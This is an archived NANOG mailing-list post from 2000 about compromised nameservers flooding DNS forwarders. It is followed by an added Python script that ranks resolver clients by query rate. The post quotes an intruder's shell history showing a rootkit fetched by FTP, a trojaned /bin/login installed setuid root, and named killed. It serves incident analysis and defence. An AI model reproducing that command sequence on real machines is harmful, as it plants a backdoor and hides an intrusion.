[28269] in North American Network Operators' Group
Re: Question about strain on the A root server
daemon@ATHENA.MIT.EDU (John Fraizer)
Sun Apr 23 02:04:09 2000
Date: Sun, 23 Apr 2000 02:01:16 -0400 (EDT)
From: John Fraizer <nanog@EnterZone.Net>
Reply-To: John Fraizer <nanog@EnterZone.Net>
To: jlewis@lewis.org
Cc: Dirk Harms-Merbitz <dirk@power.net>, nanog@merit.edu
In-Reply-To: <Pine.LNX.4.10.10004230133160.25904-100000@redhat1.mmaero.com>
Message-ID: <Pine.LNX.3.96.1000423014921.10232A-100000@Overkill.EnterZone.Net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Errors-To: owner-nanog-outgoing@merit.edu

On Sun, 23 Apr 2000 jlewis@lewis.org wrote:
> If you're looking at the stats enough to pin down heavy usage to
> individual systems, it shouldn't be too much more work to track down why
> they're suddenly making the top ten list. i.e. is it a bug in their
> resolver, or were they hacked and running some scanner kit that makes
> heavy use of DNS, with A hard-coded into the scanner?
>
While investigating several recent break-ins on client machines, I have
found that the latter is most likely the case:

From the .bash_history file that was found on one of the machines:

./t666 1
killall -9 named
./t666 1
./t666 1
./t666 1
ftp 62.0.178.10
tar -zxvf login.tgz
cd login
pico rk.h
./configure
make
cd src
mv login /bin
chmod 4755 /bin/login
ls -ls /bin/login

Sadly, the t666 program was not anywhere to be found on the machine. The
machine that was compromised was a client's nameserver. It was configured
to use our nameservers as forwarders. When the script-kiddy was running
the t666 program, it was beating the hell out of our nameservers. Alarms
went off, we checked the logs, and they showed thousands of connections open
from their nameserver to ours. When we got into the box, the login.tgz
and .bash_history file were all that was to be found.

----
John Fraizer
EnterZone, Inc
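The "top ten list" jlewis@lewis.org refers to, and the alarm that fired on EnterZone's forwarders, both come down to counting queries per downstream client and surfacing the ones whose rate is out of line. The script below is an added example, not part of this NANOG post or anything EnterZone ran: it parses a resolver query log, computes per-client totals, distinct-name counts and the peak query count in any 60-second sliding window (so a short burst is not hidden by a quiet day), and ranks the talkers. The log-line format is a constructed approximation of a BIND-style query log (adapt the regex to what your resolver actually writes), and the client addresses are constructed documentation addresses.

```python
"""Per-client DNS query-rate analysis over a resolver query log.

Added example (not from the original NANOG post). The log format and the
addresses are constructed; adjust LINE_RE to your resolver's real format.
"""
import re
from datetime import datetime, timedelta

# Constructed sample log (not real traffic). 192.0.2.10 fires twelve queries for
# twelve different names in under three seconds, the pattern a looping scanner
# or a broken resolver produces; the other two clients look like ordinary use.
# One non-query line is included to show that the parser skips it.
SAMPLE_LOG = """\
23-Apr-2000 01:30:00.120 client 192.0.2.20#1034: query: www.example.com IN A
23-Apr-2000 01:30:01.001 client 192.0.2.10#2049: query: host1.example.net IN A
23-Apr-2000 01:30:01.210 client 192.0.2.10#2050: query: host2.example.net IN A
23-Apr-2000 01:30:01.455 client 192.0.2.10#2051: query: host3.example.net IN A
23-Apr-2000 01:30:01.701 client 192.0.2.10#2052: query: host4.example.net IN A
23-Apr-2000 01:30:02.003 client 192.0.2.10#2053: query: host5.example.net IN A
23-Apr-2000 01:30:02.250 client 192.0.2.10#2054: query: host6.example.net IN A
23-Apr-2000 01:30:02.498 client 192.0.2.10#2055: query: host7.example.net IN A
23-Apr-2000 01:30:02.744 client 192.0.2.10#2056: query: host8.example.net IN A
23-Apr-2000 01:30:03.009 client 192.0.2.10#2057: query: host9.example.net IN A
23-Apr-2000 01:30:03.251 client 192.0.2.10#2058: query: host10.example.net IN A
23-Apr-2000 01:30:03.506 client 192.0.2.10#2059: query: host11.example.net IN A
23-Apr-2000 01:30:03.760 client 192.0.2.10#2060: query: host12.example.net IN A
23-Apr-2000 01:30:05.000 lame server resolving 'example.org' (in 'example.org'?): 198.51.100.7#53
23-Apr-2000 01:30:40.330 client 192.0.2.21#1201: query: ns1.example.org IN NS
23-Apr-2000 01:31:15.870 client 192.0.2.20#1035: query: mail.example.com IN MX
23-Apr-2000 01:32:02.400 client 192.0.2.21#1202: query: www.example.org IN A
23-Apr-2000 01:33:40.015 client 192.0.2.20#1036: query: www.example.com IN A
"""

# Assumed line shape: "<timestamp> client <ip>#<port>: query: <qname> IN <qtype>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) "
    r"client (?P<ip>[0-9A-Fa-f.:]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)$"
)


def parse_log(text):
    """Return a list of (timestamp, client_ip, qname, qtype).
    Lines that are not query records (lame-server notices etc.) are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
        records.append((ts, m["ip"], m["qname"].lower().rstrip("."), m["qtype"]))
    return records


def client_stats(records, window=timedelta(seconds=60)):
    """Per-client totals plus the peak number of queries in any sliding window
    of the given length; a burst shows up here even if the daily total is small."""
    by_ip = {}
    for ts, ip, qname, _qtype in records:
        entry = by_ip.setdefault(ip, {"times": [], "names": set()})
        entry["times"].append(ts)
        entry["names"].add(qname)
    stats = {}
    for ip, entry in by_ip.items():
        times = sorted(entry["times"])
        peak, j = 0, 0
        for i in range(len(times)):
            # advance j to the first query that falls outside the window opened at i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            peak = max(peak, j - i)
        stats[ip] = {
            "queries": len(times),
            "distinct_names": len(entry["names"]),
            "peak_in_window": peak,
        }
    return stats


def top_talkers(stats, n=10):
    """The 'top ten list': clients ranked by total query count (ties by address)."""
    ranked = sorted(((ip, s["queries"]) for ip, s in stats.items()),
                    key=lambda kv: (-kv[1], kv[0]))
    return ranked[:n]


def flag_clients(stats, burst_threshold=10):
    """Clients whose peak window count reaches the threshold; these are the ones
    worth a call to the customer to ask what the box is running."""
    return sorted(ip for ip, s in stats.items() if s["peak_in_window"] >= burst_threshold)


if __name__ == "__main__":
    stats = client_stats(parse_log(SAMPLE_LOG))
    for ip, total in top_talkers(stats):
        s = stats[ip]
        print(f"{ip:15} total={total:3} distinct={s['distinct_names']:3} "
              f"peak/60s={s['peak_in_window']:3}")
    print("flagged:", flag_clients(stats))
```

The threshold of ten queries per minute is only sensible for this tiny constructed sample; on a real forwarder it is set from the observed baseline of the downstream nameservers. The distinct-name count is the second signal worth keeping: a client that repeats one or two names is usually a retry loop or a broken resolver, while one that never repeats a name in a burst looks like something walking a list.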